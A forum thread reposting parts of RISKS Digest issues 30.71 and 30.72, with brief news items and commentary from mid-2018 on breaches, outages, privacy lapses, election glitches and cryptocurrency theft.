    vulnerabilities and default passwords that end users had yet to patch or
    change. That uncertainty is likely driving the advice in the FBI statement
    that all router and NAS users reboot, rather than only users of the 14
    models known to be affected by VPNFilter [...]

    ------------------------------

    Date: Sun, 27 May 2018 13:25:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Banks Adopt Military-Style Tactics to Fight Cybercrime (NYTimes)

    *The New York Times*

    ``Those are the decisions you don't want to be making for the first time
    during a real attack,'' said Bob Stasio, IBM's cyber range operations
    manager and a former operations chief for the National Security Agency's
    cyber center. One financial company's executive team did such a poor job of
    talking to its technical team during a past IBM training drill, Mr. Stasio
    said, that he went home and canceled his credit card with them.

    Like many cybersecurity bunkers, IBM's foxhole has deliberately theatrical
    touches. Whiteboards and giant monitors fill nearly every wall, with
    graphics that can be manipulated by touch.

    ``You can't have a fusion center unless you have really cool TVs,'' quipped
    Lawrence Zelvin, a former Homeland Security official who is now Citigroup's
    global cybersecurity head, at a recent cybercrime conference. ``It's even
    better if they do something when you touch them. It doesn't matter what
    they do. Just something.''

    Security pros mockingly refer to such eye candy as `pew pew' maps, an
    onomatopoeia for the noise of laser guns in 1980s movies and video
    arcades. They are especially useful, executives concede, to put on display
    when V.I.P.s or board members stop by for a tour. Two popular pew maps are
    from FireEye https://www.fireeye.com/cyber-map/threat-map.html and the
    defunct security vendor Norse http://www.norsecorp.com/ whose video
    game-like maps show laser beams zapping across the globe. Norse went out of
    business two years ago, and no one is sure what data
    <https://na01.safelinks.protection.outlook.com/ the map is based on, but
    everyone agrees that it looks cool.

    http://www.nytimes.com/2018/05/20/business/banks-cyber-security-military.html

    ------------------------------

    Date: Sun, 27 May 2018 16:26:44 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: How One Company Scammed Silicon Valley. And How It Got Caught.
    (John Carreyrou)

    BAD BLOOD
    John Carreyrou
    Secrets and Lies in a Silicon Valley Startup
    352 pp. Alfred A. Knopf. $27.95.
    *The New York Times* Book Review
    http://www.nytimes.com/2018/05/21/books/review/bad-blood-john-carreyro

    "Despite warnings from employees that Theranos wasn't ready to go live on
    human subjects -- its devices were likened to an eighth-grade science
    project -- Holmes was unwilling to disappoint investors or her commercial
    partners. The result was a fiasco. Samples were stored at incorrect
    temperatures. Patients got faulty results and were rushed to emergency
    rooms. People who called Theranos to complain were ignored; employees who
    questioned its technology, its quality control or its ethics were
    fired. Ultimately, nearly a million tests conducted in California and
    Arizona had to be voided or corrected."

    Investors and personalities enamored by technological wizardry, though based
    on fundamentally fraudulent solutions, were suckered in by Theranos' promise
    to revolutionize routine blood tests with a few tiny blood droplets from a
    pinprick. ~US$ 1B dropped on a real "unicorn" sighting.

    The Theranos founder, Elizabeth Holmes, preferred sycophants and colleagues
    who possessed 110-ohm noses (striped brown-brown-brown per the Resistor
    color code) that kissed her fanny. Findings and facts that disputed her
    vision were concealed from investors. Knowing how to ask the right questions
    remains a valuable skill to possess.

    When an ethical, professional engineer confronts a situation of this nature,
    there are few alternatives to pursue: (a) become a whistle-blower; (b)
    continue to document findings that support legal discovery and a fraud
    investigation while holding your nose and tongue; or, (c) jump ship at the
    earliest opportunity.

    If something appears too good to be true, it is likely the case.
    P.T. Barnum, the circus entrepreneur,is reputed to have said, "There's a
    sucker born every minute." An aphorism that remains prescient today for the
    incurious or greedy.

    ------------------------------

    Date: Sun, 27 May 2018 17:30:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Jaron Lanier: How Can We Repair The Mistakes Of The Digital Era? (NPR)

    https://www.npr.org/templates/transcript/transcript.php?storyId=6140792

    Get out your checkbook or boost your PayPal account balance. All the free
    services "enjoyed" today, that exploit volunteered information for a little
    dopamine, will shift to a subscription or micropayment model.

    The Internet as a true utility, like the water and power that comes out of
    the wall, billed per bit. Internet disenfranchisement is likely to evolve if
    meter ticks attributed to premium information become unaffordable.

    Will governments introduce a subsidy -- a new entitlement -- to boost the
    information "have-nots" into a realm approximating the "haves"? Or will there
    be a multi-tier model -- surrender your data for 24x7 tracking and attention
    whipsaw for free, versus pay for the right to volunteer data with an
    explicit opt-in (EU ePrivacy) granting license and viewing preferences as
    the product?

    ------------------------------

    Date: Mon, 28 May 2018 08:05:13 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: YouTube stars' fury over algorithm tests (BBC.com)

    http://www.bbc.com/news/technology-44279189

    'Originally, the YouTube subscription feed was a chronological list of
    videos from all the channels that a person had chosen to "subscribe"
    to. The system let people curate a personalised feed full of content from
    their favourite video-makers.

    'However, many video-makers have previously complained that some of their
    videos have not appeared in the subscription feed, and have questioned
    whether YouTube manipulates the list to boost viewer retention and
    advertising revenue.

    'YouTube's latest experiment -- which it said appeared for a "small number"
    of users -- changed the order of videos in the feed. Instead of showing the
    most recent videos at the top, YouTube said the manipulated feed showed
    people "the videos they want to watch".'

    Algorithmic refactoring experiment adjusts video delivery order.
    YouTube apparently 'wins' over content creator/copyright owners,
    despite subscription historical preference and profile settings.

    ------------------------------

    Date: Tue, 29 May 2018 16:10:52 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Amazon Toilet Paper Order of Over $7,000 Refunded 2 Months Later
    (Fortune)

    http://fortune.com/2018/05/25/woman-charged-7000-for-toilet-paper-ordered-amazon-refunded/

    The risk? Online/automated/robot cashiers. Same as my grocery store
    self-checkout charged me for 22 avocados instead of 2. At least I could get
    quick refund from on-scene humans.

    ------------------------------

    Date: Tue, 29 May 2018 17:14:58 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Amazon's Echo privacy flub has big implications for IT (Evan Schuman)

    Evan Schuman, *Computerworld*, 26 May 2018
    https://www.computerworld.com/artic...privacy-flub-has-big-implications-for-it.html

    Amazon has confirmed that one of its Echo devices recorded a family's
    conversation and then messaged it to a random person on the family's contact
    list. The implications are terrifying.

    ------------------------------

    Date: Tue, 29 May 2018 17:34:18 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Bank of Montreal, CIBC's Simplii Financial report customer data
    breaches" (Asha McLean)

    Asha McLean, ZDNet, 29 May 2018
    http://www.zdnet.com/article/bank-o...lii-financial-confirm-customer-data-breaches/

    Bank of Montreal, CIBC's Simplii Financial report customer data breaches The
    Canadian banks have reported being contacted by external 'fraudsters'
    claiming to have accessed information on an estimated 90,000 customers. The
    trial appears to be limited to 24 plates.

    The plates are digital displays that can be updated and modified remotely.
    Therefore, they can be updated immediately once car registration is updated.
    They can also be used to "broadcast" messages such as emergency and amber
    alerts, and can be set to display personal messages when the car is not in
    motion.

    http://www.dailymail.co.uk/sciencet...l-license-plates-allow-police-track-move.html
    or https://is.gd/NRJ4Ey

    The plates also broadcast information to sensors in or beside roads, and can
    communicate with each other.

    I trust it is not too difficult to point out the huge numbers of ways these
    plates could be attacked or misused.

    Asha McLean, ZDNet, 1 Jun 2018
    CBA sent over 650 emails holding data on 10k customers in error. The bank
    has admitted discovering an issue with emails going to incorrect addresses.
    https://www.zdnet.com/article/cba-sent-over-650-emails-holding-data-on-10k-customers-in-error/

    opening text:

    The Commonwealth Bank of Australia (CBA) has once again found itself in the
    spotlight for the potential mishandling of customer information, admitting
    it had sent over 650 incorrectly addressed internal emails.

    The bank said on Friday it had completed an investigation that was initiated
    after a concern was raised about internal CBA emails being inadvertently
    sent to email addresses using the cba.com domain, prior to taking ownership
    of that domain in April 2017.

    Its usual email domain is cba.com.au.

    ------------------------------

    Date: Thu, 31 May 2018 07:21:49 +0800
    From: Jeremy Ardley <jer...@ardley.org>
    Subject: License Plate Risks

    Two different dynamically changeable number plates.

    The traditional:
    http://www.youtube.com/watch?v=wSFXyIlq5xw

    The $699 plus $7/month electronic paper version issued by the California
    Department of Motor Vehicles:


    I leave it as an exercise for the reader as to what risks exist in
    either. Asides that is from pointing out the stupidity of an electronic tag
    in the age of high quality Automatic Number Plate Recognition systems linked
    to a licensing computer.

    However, there is a second risk in being able to detect unlicensed vehicles;
    work overload. The Western Australian Police have had to turn off the
    unlicensed vehicle feature in their ANPR system because there are too many
    alerts!

    "WA Police 'can't cope' with high number of auto-detect car registration
    alerts"

    http://www.abc.net.au/news/2014-06-17/end-of-the-road-for-police-alert-software/5528160

    ------------------------------

    Date: Wed, 30 May 2018 18:37:19 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Jira bug exposed private server keys at major companies,
    researcher finds" (Zack Whittaker)

    Zack Whittaker, ZDNet, 30 May 2018
    https://www.zdnet.com/article/jira-...ver-keys-at-major-companies-researcher-finds/

    Jira bug exposed private server keys at major companies, researcher finds A
    major TV network, a UK cell giant, and one US government agency are among
    the companies affected.

    ------------------------------

    Date: Thu, 31 May 2018 19:39:42 -0400
    From: =?iso-8859-1?Q?Jos=E9_Mar=EDa?= Mateos <ch...@rinzewind.org>
    Subject: Google Started a Political Sh*tstorm Because of Its Over-Reliance
    on Wikipedia (Motherboard)

    https://motherboard.vice.com/en_us/article/435n9j/google-republicans-are-nazis-explanation

    As VICE News reported earlier Thursday, a Google search for `California
    Republican Party' resulted in Google listing `Nazism' as the ideology of the
    party. This happened because of Google's Featured Snippets tool, which pulls
    basic information for search terms and puts it on the front page. These are
    also sometimes called Google Cards and Knowledge Panels.

    The information on these cards is often taken from Wikipedia entries, which
    is what seems to have happened here. Six days ago, someone edited the
    Wikipedia page for `California Republican Party' to include `Nazism',
    something that wasn't changed until Wednesday, Wikipedia's edit logs show.

    You take content from another site and put it into yours and pretend it's
    "the truth", and all that is an automated process. Can't see what might go
    wrong there.

    ------------------------------

    Date: Fri, 01 Jun 2018 15:36:42 -0700
    From: RICHARD M STEIN <rms...@ieee.org>
    Subject: Signs of sophisticated cellphone spying found near White House,
    U.S. officials say (WaPo)

    https://www.washingtonpost.com/news...use-say-u-s-officials/?utm_term=.3cff9618ae33

    "A federal study found signs that surveillance devices for intercepting
    cellphone calls and texts were operating near the White House and other
    sensitive locations in the Washington area last year."

    Only Rip Van Winkle would have been surprised by this headline. What
    precautions are the SIGINT targets using to forestall intercept? Are
    they effective, or have they been compromised too? Whatever happened to
    good ol' "Blackbag" jobs?

    ------------------------------

    Date: Fri, 1 Jun 2018 14:04:19 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Massive Visa Outage Shows the Fragility of Global Payments (WiReD)

    NNSquad
    https://www.wired.com/story/visa-outage-shows-the-fragility-of-global-payments/

    On Friday, VISA'S payment network suffered outages across Europe, limiting
    transactions for both businesses and individuals. Banks and commerce
    groups began advising customers to use cash or other payment cards if
    possible, and reports indicated that online and contactless transactions
    were having more success than chip cards. Though some Visa transactions
    still went through, the failure appeared widespread. The Financial Times
    even reported that some ATMs in the United Kingdom were already out of
    cash within a couple of hours of the first outage reports. Some observers
    saw in the outage a stark reminder of the fragility of payment networks,
    and the weaknesses in global economic platforms.

    ------------------------------

    Date: Sat, 2 Jun 2018 02:01:55 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How can criminals manipulate cryptocurrency markets?
    (The Conversation)

    https://theconversation.com/how-can-criminals-manipulate-cryptocurrency-markets-97294

    ------------------------------

    Date: Fri, 25 May 2018 18:32:06 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Ad Blocker Ghostery Celebrates GDPR Day by Revealing Hundreds
    of User Email Addresses (Gizmodo)

    via NNSquad [Thanks, EU!]
    http://gizmodo.com/ad-blocker-ghostery-celebrates-gdpr-day-by-revealing-hu-1826338313

    Ad-blocking tool Ghostery suffered from a pretty impressive,
    self-inflicted screwup Friday when the privacy-minded company accidentally
    CCed hundreds of its users in an email, revealing their addresses to all
    recipients. Fittingly, the inadvertent data exposure came in the form of
    an email updating Ghostery users about the company's data collection
    policies. The ad blocker was sending out the message to affirm its
    commitment to user privacy as the European Union's digital privacy law,
    known as the General Data Protection Regulation (GDPR), goes into effect.
    The email arrived in inboxes with the subject line "Happy GDPR Day --
    We've got you covered!" In the body of the email, the company informed
    users, "We at Ghostery hold ourselves to a high standard when it comes to
    users' privacy, and have implemented measures to reinforce security and
    ensure compliance with all aspects of this new legislation."

    ------------------------------

    Date: Sun, 27 May 2018 13:30:02 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Commentary: GDPR Misses the Point (Fortune)

    http://fortune.com/2018/05/24/gdpr-data-privacy-cookies/

    ------------------------------

    Date: Sun, 3 Jun 2018 12:08:40 -0700
    From: Rob Slade" <rms...@shaw.ca>
    Subject: GDPR, Privacy, and CISSPforum vs "Community"

    The long running CISSPforum mailing list on Yahoo Groups is being closed by
    ISC2, effective June 15, 2018. An alternate mailing list, run by volunteer
    CISSPs, has been created on groups.io.

    Yeah, I know. Those of you who don't have the CISSP cert don't care. (Even
    those who, like Peter, have been given an honorary CISSP may not care.) But
    the reason the CISSPforum is being closed is kind of interesting.

    ISC2 itself isn't saying much about why. But most people discussing it seem
    to think it has to do with GDPR. Yahoo has not had the greatest success
    with security, so ISC2 may wish to limit it's exposure.

    The thing is, if I want to give people instructions on getting to the new
    CISSPforum, the easiest thing would be to send them to the page at
    https://community.isc2.org/t5/Welcome/CISSPforum-replacement/td-p/11006 (or
    https://is.gd/lGXNgT if email mungs that and you want a shortened version).
    Yes, you are correct. That Web page is one of the postings on the new,
    supposedly private, "community" that ISC2 has created to replace the
    CISSPforum mailing list as a communications venue for the membership.

    And, if I want to send you to the existing discussion of the various privacy
    issues to do with the new "community," I can point you to
    https://community.isc2.org/t5/Welco...censorship-Closing-of-CISSP/td-p/11021/page/2
    or http://is.gd/GgHckH Or, you can search for it yourself, on Google:
    http://lmgtfy.com/?q=see+the+amazing+dancing+CISSPs+and+all+their+discussions

    You will be able to see all kinds of discussion on the new forum. Do a
    Google search with any term you want, and include site:community.isc2.org as
    a term, and see what the amazing dancing CISSPs have said about it. (There
    is one area of the "community" that is not searchable, but it's fairly
    small.)

    ------------------------------

    Date: Sun, 3 Jun 2018 19:24:04 -0400
    From: =?iso-8859-1?Q?Jos=E9_Mar=EDa?= Mateos <ch...@rinzewind.org>
    Subject: German spy agency can keep tabs on Internet hubs: court (Phys)

    http://phys.org/news/2018-05-german-spy-agency-tabs-internet.html

    De-Cix, the world's largest Internet hub, says Germany's spy agency is able
    to get a complete and unfiltered copy of the all data passing through its
    fibre optic cables

    Germany's spy agency can monitor major Internet hubs if Berlin deems it
    necessary for strategic security interests, a federal court has ruled.

    In a ruling late on Wednesday, the Federal Administrative Court threw out a
    challenge by the world's largest Internet hub, the De-Cix exchange, against
    the tapping of its data flows by the BND foreign intelligence service.

    The operator had argued the agency was breaking the law by capturing German
    domestic communications along with international data.

    http://rinzewind.org/blog-es

    ------------------------------

    Date: Sat, 26 May 2018 13:02:30 -0400
    From: John Ohno <john...@gmail.com>
    Subject: Trendism and cognitive stagnation

    Originally posted here:


    Trendism & cognitive stagnation

    (This is a follow-up to Against Trendism
    )

    Basing visibility on popularity is a uniquely awful version of *tyrrany of
    the majority* because uncommon views become invisible, even if, were they to
    start on an even playing field, they would become popular.

    In this way, it encourages mental stasis: since ranking is based on an
    immediate appraisal of how popular something already is, and visibility is
    based therefore on past shallow popularity, there's no room for
    rumination.

    This is NOT an attribute of `technology' or `social media', but an attribute
    of visibility systems based on immediate ranking. Visibility systems based
    on ranking delayed by, say, three days, or with the top 25% most popular
    posts elided, would be fine.

    Our capacity to imagine new possibilities is based largely on our
    familiarity with the bounds of possibility space -- we can only
    imagine views that are in the neighborhood of views we've heard
    expressed in the past. So, making the already-unpopular invisible limits
    imagination.

    (There are hacks we can use to make it possible to imagine views nobody has
    ever held. We can make random juxtapositions, impose meaning on them, and
    then figure out a justification for them -- like tarot reading. Or,
    we can merely iterate from some basic idea, getting more and more extreme,
    while internalizing the perspective of each iteration as something someone
    could possibly believe in good faith. The former -- the bibliomancy
    approach -- is common in experimental art, while the latter is
    typical of dystopian science fiction.

    But, these hacks are pretty limited. We need a starting place. If
    we've only heard mainstream ideas, we're going to have a
    hard time going off the beaten path with the dystopia approach, while we
    will struggle with the bibliomancy approach because most ideas can only be
    made to seem reasonable with the help of other ideas. Getting into uncharted
    territories with either of these approaches is difficult unless
    you've already filled out the middle of your possibility space with
    other ideas, because in their absence you would need to independently
    reinvent them.)

    This is not a justification, in of itself, for banning metrics entirely.
    After all, this kind of exponential distribution happens with ideas even
    without the use of popularity signifiers: ideas spread, and popular ideas
    have more opportunities to spread. Trendism merely accelerates the process
    and widens the gap between the most popular ideas and everything else.

    Sites like reddit use segmentation to prevent total ordering of popularity
    from dominating, although this ultimately means that popular subreddits have
    a disproportionate impact on this total ordering when it is seen.
    http://redditp.com/r/all

    Similarly, we have seen piecemeal attempts to limit the effects of trendism
    for particular topics -- the curation of trending topics at twitter and
    facebook, for instance, or ad-hoc ranking demerits for particular tags on
    lobste.rs.

    However, we could be applying the measurements we already take to counteract
    trendism rather than accelerating it: making popularity count less the
    higher it gets, removing overly-popular content entirely, boosting the
    visibility of mostly-unseen content, using information about organic reach
    in sites like twitter to boost the synthetic reach of people who
    don't have many followers (instead of boosting the synthetic reach
    of the rich), systematically demoting posts that comment on trending topics,
    spotlighting spotify tracks and youtube videos with zero views, and so on.

    Where trendism devalues the function of recommendation systems as novelty
    aggregators, these tools could be modified to be anti-trendist, pro-novelty,
    and promote a cosmopolitanism that broadens our horizons in ways traditional
    word-of-mouth never could. This is a unique capacity of recommendation
    systems over curators: recommendation systems can recommend things nobody
    has ever seen, and can recommend them on the grounds that nobody has seen
    them.

    ------------------------------

    Date: Mon, 28 May 2018 09:38:16 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: Securing Elections

    I don't wish to start a political argument, but from a practical POV, there
    is merit to the US method of "the winner takes it all" -- eventually, one
    candidate wins, and incumbents should be let to do their job to the best of
    their ability. Compare that to relational methods in some European
    countries, which have brought about unstable governments which are
    reshuffled often (like in France before the 1968, or current Italy).

    History has proven -- from the resign of Nixon to the recent upheaval in
    Armenia -- that as long as freedom of expression and assembly are kept, the
    public would eventually be able to express enough dissent to get rid of
    corrupt politicians, no matter which system was used to elect them in the
    first place.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!
    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.71
    ************************
     
  6. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.72

    RISKS List Owner

    Jun 12, 2018 8:07 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 12 June 2018 Volume 30 : Issue 72

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Another risk of driverless cars (PGN)
    Emirates looks to windowless planes (bbc.com)
    180,000 Voters accidentally left off LA County polling place rosters
    (Irfan Khan)
    Ontario election results Not a Number (Tony Marmic)
    Florida skips gun background checks for a year after employee forgets login
    (Naked Security)
    All accredited journalists at the #KimTrumpSummit get a free USB fan
    (YCombinator)
    Israelis nabbed in Philippines are tip of iceberg in alleged fraud
    gone global (The Times of Israel)
    Sweden Tries to Halt Its March to Total Cashlessness (Bloomberg)
    Cryptocurrencies Lose Billions In Value After An Exchange Is Hacked
    "Cryptocurrency theft malware is now an economy worth millions" (NPR)
    Quebec Halts Bitcoin Mining Power Requests Amid Booming Demand
    (Charlie Osborne)
    The Spanish Liga uses the phone microphone of millions of fans
    to spy on bars (El Diario)
    Navy Contractor Hacked: Reams of Secret Documents Taken (WashPo)
    G Suite leaks in 10,000+ orgs: Google UX blamed, fury at no-bug defense
    (TechBeacon)
    "Password reset flaw at Internet giant Frontier allowed account takeovers"
    (Zack Whittaker)
    Why a DNA data breach is much worse than a credit card leak (The Verge)
    "Facebook gave some companies extended access to user data"
    (Stephanie Condon)
    Facebook bug made up to 14 million users' posts public for days (WiReD)
    "Cisco fixes critical bug that exposed networks to hackers"
    (Zack Whittaker)
    "Meet Norman, the world's first 'psychopathic' AI" (Charlie Osborne)
    Should We Always Trust What We See in Satellite Images?
    (Scientific American)
    The NSA Just Released 136 Historical Propaganda Posters (Motherboard)
    Unproven facial-recognition companies target schools, promising an
    end to shootings (WashPo)
    The Zip Slip vulnerability: what you need to know (Naked Security)
    All the people Apple just pissed off to better protect your privacy
    (Fast Company)
    Recounting 'Horror Stories' Over Guitar Center's Warranties (NYT)
    Add Bryan Colangelo to the long list who have been burned by social media
    *ESPN)
    Microsoft, Github, & distributed revision control (Medium)
    How the body could power pacemakers and other implantable devices
    (Charles Q. Choi)
    Having better risk-based analysis for your banks and credit cards
    (David Strom, Phil Smith III)
    Re: Securing Elections (Chris Drewe)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 11 Jun 2018 9:27:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Another risk of driverless cars

    NPR reported today that Waymo is buying a slew of cars to create a
    driverless taxi fleet with no human overseer required in the car. Emergency
    takeover would be done by a fleet of well-trained remote admin personnel,
    *via cell phone*.

    There seem to be some massive flaws in that reasoning. One is the need for
    real-time response. Another is unavailable cell-phone coverage.

    I recall the case of someone who used his cellphone to start his car at
    home, and then drove into Red Rock Canyon Park, parked, and later tried to
    start his car (with the presence of his cellphone). Unfortunately, he had
    left his wireless unlocking/starting dongle at home, and there was no cell
    coverage in the canyon. His wife climbed up out of the canyon, called a
    neighbor who could get the remote dongle out of their house, and bring it to
    them so that they could drive home.

    Just one more example of short-sightedness and lack of awareness...

    ------------------------------

    Date: Wed, 06 Jun 2018 19:44:30 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Emirates looks to windowless planes (bbc.com)



    Aviation safety expert Professor Graham Braithwaite of Cranfield University:

    ``Cabin crew need to be able to see outside the aircraft if there is an
    emergency. Being able to see outside the aircraft in an emergency is
    important, especially if an emergency evacuation has to take place. Flight
    attendants would need to check outside the aircraft in an emergency, for
    example for fire, before opening a door and commencing an evacuation - and
    anything that needed power to do this may not be easy to get certified by
    an aviation safety regulator.'' Prof Braithwaite said the main obstacle
    in a windowless aircraft would be passenger perceptions of the
    technology.

    However, aviation regulator the European Aviation Safety Agency said: "We
    do not see any specific challenge that could not be overcome to ensure a
    level of safety equivalent to the one of an aircraft fitted with cabin
    windows.

    In addition to emergency evacuation slides, perhaps an emergency "peep hole"
    to supplement camera or screen failure?

    [Perhaps the pilots would not need windows either, because everything is
    computer controlled? PGN]

    ------------------------------

    Date: Wed, 6 Jun 2018 5:50:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: 180,000 Voters accidentally left off LA County polling place rosters
    (Irfan Khan)

    (Irfan Khan / Los Angeles Times)
    Mercado de Los Angeles in Boyle Heights on Tuesday.
    Poll worker Shannon Diaz puts up signs as voting begins at El Mercado de
    Los Angeles in Boyle Heights on Tuesday.

    If you are a registered voter in Los Angeles County and poll workers say
    they can't find your name on the roster at the polling place when you go to
    vote, don't worry -- you can still cast a provisional ballot.

    Some Angelenos needed a bit of reassurance that their votes would be counted
    in Tuesday's primary election after 118,522 voters' names were accidentally
    left off rosters due to a printing error, according to L.A. County
    Registrar Dean C. Logan.

    About 2.3% of L.A. County's 5.1 million registered voters and 35% of the
    county's 4,357 precincts were affected by the error, according to figures
    provided by the registrar-recorder/county clerk's office, which was still
    trying to determine the reason for the printing error. Voters whose names
    are missing are being encouraged to file provisional ballots, which are
    verified by vote counters later.

    118,522 voters accidentally left off Los Angeles County polling place rosters

    ------------------------------

    Date: Fri, 8 Jun 2018 16:42:48 -0400
    From: Tony Harminc <thar...@gmail.com>
    Subject: Ontario election results Not a Number

    Early in the counting for the Ontario provincial election on Thursday
    evening 2018-06-07, I noticed the CBC election site displayed this dynamic
    table of popular vote numbers:

    Party Votes Vote Share
    PC 389,435 40.45%
    NDP 333,475 34.63%
    LIB 174,446 18.12%
    GRN 48,022 4.99%
    OTH 17,467 NaN%

    The "NaN%" survived several on-the-fly updates to the numbers.

    When I checked on Friday morning, with final results in, the table was

    Party Votes Vote Share
    PC 2,322,422 40.63%
    NDP 1,925,574 33.69%
    LIB 1,103,283 19.30%
    GRN 263,987 4.62%
    OTH 100,058 1.75%

    It's not obvious to me why the first set of numbers should lead to a NaN for
    the "OTH" parties vote share rather than 1.81%. The page is still there at
    Ontario Election Results From CBC News if anyone cares to
    investigate the code, but I don't know how long it'll last. One trusts that
    this code is purely for display on the CBC website, and has nothing to do
    with actual vote tallying...

    In passing, this election was conducted with paper ballots hand marked and
    scanned by machine, with the ballots retained for hand recount if necessary,
    so pretty much Best Practice as I understand it. I don't believe any such
    recount has been called for.

    ------------------------------

    Date: Tue, 12 Jun 2018 11:52:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Florida skips gun background checks for a year after employee
    forgets login (Naked Security)

    In Florida, the site of recent mass shootings such as at the Stoneman
    Douglas High School and the Pulse nightclub, more than a year went by in
    which the state approved applications without carrying out background
    checks. This meant the state was unaware if there was a cause to refuse a
    licence to allow somebody to carry a hidden gun -- for example, mental
    illness or drug addiction.

    The reason is dismayingly banal: an employee couldn't remember her login.

    Florida skips gun background checks for a year after employee forgets login

    ------------------------------

    Date: Mon, 11 Jun 2018 16:04:31 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: All accredited journalists at the #KimTrumpSummit get a free USB fan
    (YCombinator)

    [Nothing to worry about!]
    https://news.ycombinator.com/item?id=17285062

    Oh yeah. Just plug it into your computer. For sure.

    ------------------------------

    Date: Tue, 12 Jun 2018 13:01:51 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Israelis nabbed in Philippines are tip of iceberg in alleged fraud
    gone global (The Times of Israel)

    As police raid Israeli-operated boiler rooms in Asia and Eastern Europe,
    local law enforcement has yet to indict a single operative from an industry
    that has stolen billions

    Israelis nabbed in Philippines are tip of iceberg in alleged fraud gone global

    ------------------------------

    Date: Mon, 11 Jun 2018 17:53:32 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Sweden Tries to Halt Its March to Total Cashlessness (Bloomberg)

    via NNSquad
    Sweden Tries to Halt Its March to Total Cashlessness

    The move is a response to Sweden's rapid transformation as it becomes one
    of the most cashless societies in the world. That's led to concerns that
    some people are finding it increasingly difficult to cope without access
    to mobile phones or bank cards. There are also fears around what would
    happen if the digital payments systems suddenly crashed.

    ------------------------------

    Date: Mon, 11 Jun 2018 21:59:28 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Cryptocurrencies Lose Billions In Value After An Exchange Is Hacked
    (NPR)

    Coinrail virtual currency exchange was breached, and lost only $40M.
    Ethereum dropped, and the end result was an estimated $40B lost over the
    weekend to cryptocurrencies overall. (PGN-ed)
    https://www.npr.org/2018/06/11/6189...billions-in-value-after-an-exchange-is-hacked

    ------------------------------

    Date: Fri, 08 Jun 2018 20:23:45 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cryptocurrency theft malware is now an economy worth millions"
    (Charlie Osborne)

    Charlie Osborne for Zero Day (7 Jun 2018)
    Carbon Black research suggests that as interest in cryptocurrency rises,
    so does the market for weapons to steal it.
    https://www.zdnet.com/article/cryptocurrency-theft-malware-is-now-an-economy-worth-millions/

    selected text:

    The researchers estimate that over the past six months alone, a total of
    $1.1 billion has been stolen in cryptocurrency-related thefts, and
    approximately 12,000 marketplaces in the underbelly of the Internet are
    fueling this trend.

    In total, there are roughly 34,000 products and services on sale that are
    related to cryptocurrency theft, ranging from just over a dollar in price to
    $224, with an average cost of around $10.

    "The available dark web marketplaces represent a $6.7 million illicit
    economy built from cryptocurrency-related malware development and sales,"
    the researchers say.

    ------------------------------

    Date: Sun, 10 Jun 2018 18:06:14 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
